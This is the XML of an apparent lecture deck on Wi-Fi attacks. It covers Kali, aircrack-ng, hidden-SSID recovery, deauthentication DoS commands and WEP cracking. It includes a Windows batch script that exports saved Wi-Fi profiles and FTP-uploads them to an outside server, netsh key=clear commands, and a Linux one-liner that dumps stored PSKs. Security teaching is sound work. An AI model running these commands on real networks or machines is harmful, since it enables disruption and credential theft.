          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Laptop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wireless card allowing monitor mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prism3, Atheros, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ralink</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why? Monitor mode, packet injection, open source drivers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Readily installed useful software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9957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Airodump-ng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-10-01 at 1.47.47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63797"/>
            <a:ext cx="9144000" cy="437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09802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SSID = ESSID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>32 characters long, case sensitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Broadcast or Hidden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If broadcast, beacon indicates SSID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If hidden, beacon has null SSID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Why not stop sending beacon?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41791822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9-24 at 4.39.13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077" y="4237150"/>
            <a:ext cx="4526923" cy="2620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SSID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SSID = ESSID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>32 characters long, case sensitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Broadcast or Hidden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If broadcast, beacon indicates SSID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If hidden, beacon has null SSID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Why not stop sending beacon?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Hidden SSID is secure?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883847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hidden SSID is exposed?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Clients associate with AP by probing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Probe request/ probe response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Probe-request may contain SSID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Probe-response must contain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Association request contains SSID</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So we do…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>just wait for probe response messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>or disassociate a client to start probing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 5 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;BSSID&gt; mon0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429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aireplay-ng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Performs attacks by packet injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -&lt;attack mode&gt; (or --&lt;attack name&gt;) &lt;attack option&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack modes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/0: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deauthenticate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a station by sending </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deauthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> packet for given AP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>option = count</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Goal: SSID recovery, forcing WPA handshake, forcing ARP request (for windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No station, no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> attack works</a:t>
            </a:r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879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aireplay-ng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Other Attack modes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fakeauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/1: take steps for authentication of open network, to get ready for other attacks that require the hacker’s machine to be authenticated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>interactive/2: send any packet </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arpreplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/3: capture an ARP packet and resend to AP, repeatedly, getting new ARP res from AP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ivs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>chopchop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/4: decrypt a packet without knowing WEP key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>fragment/5: obtain 1500 bytes key-stream </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>caffe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-latte/6: get enough packet to crack WEP key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cfrag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/7, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>migmode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/8:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42534833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Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Suite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-10-01 at 1.31.3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500" y="1417638"/>
            <a:ext cx="8255000" cy="527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617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DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deauthentication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aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 1000 -a &lt;BSSID&gt; -c &lt;target&gt; mon0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1000 -a &lt;BSSID&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mon0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attack all clients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3968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Extract password from the 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Operating system stores wireless network information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESSID, BSSID, Connection Method, Encryption, Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wireless Profile via GUI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>or through script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NetworkManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/system-connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42110555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Steal WLAN Password in Windows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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netsh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smtClean="0"/>
              <a:t>can manage wireless profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>run in command prompt (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) as admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>list profiles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> show profiles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>show passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> show profiles &lt;ESSID&gt; key=clear</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>export profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> export profile folder=&lt;folder&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> export profile key=clear folder=&lt;folder&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>import profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> add profile filename=&lt;filename&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336580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Wireshark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free and open-source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>packet analyzer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491" y="2309580"/>
            <a:ext cx="7738223" cy="436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1920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Script in Windows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/>
              <a:t>@echo off</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> c:\Temp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wlan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> export profile folder=c:\Temp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@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ftp -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -s:”%~f0′′&amp;GOTO:EOF</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>myserver.com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my_username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my_password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!:— FTP commands below here —</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cd location/for/storage</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>put c:\Temp\*.xml</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>disconnect</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>quit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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96003598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Steal WLAN Password in Linux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Profile is stored in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NetworkManage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/system-connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>find –exec &lt;command&gt; {} \;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –E &lt;RE&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Redirection &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>find /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetworkManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/system-connections -type f -print -exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cat {} \; | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -E '(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>|^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-key|^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>psk|mac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)' &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wifipass.txt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9457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Aircrack-ng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WEP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WPA(2) PSK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>key cracking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WEP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Recover key from captured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ciphertexts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First method: PTW (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pyshkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Weinmann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First, use ARP packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If not working, use all packets (but only IP/ARP can be used)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad: Only 40/104 WEP keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Good: very few data packets are required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FMS/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>KoreK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>statistical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>brute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
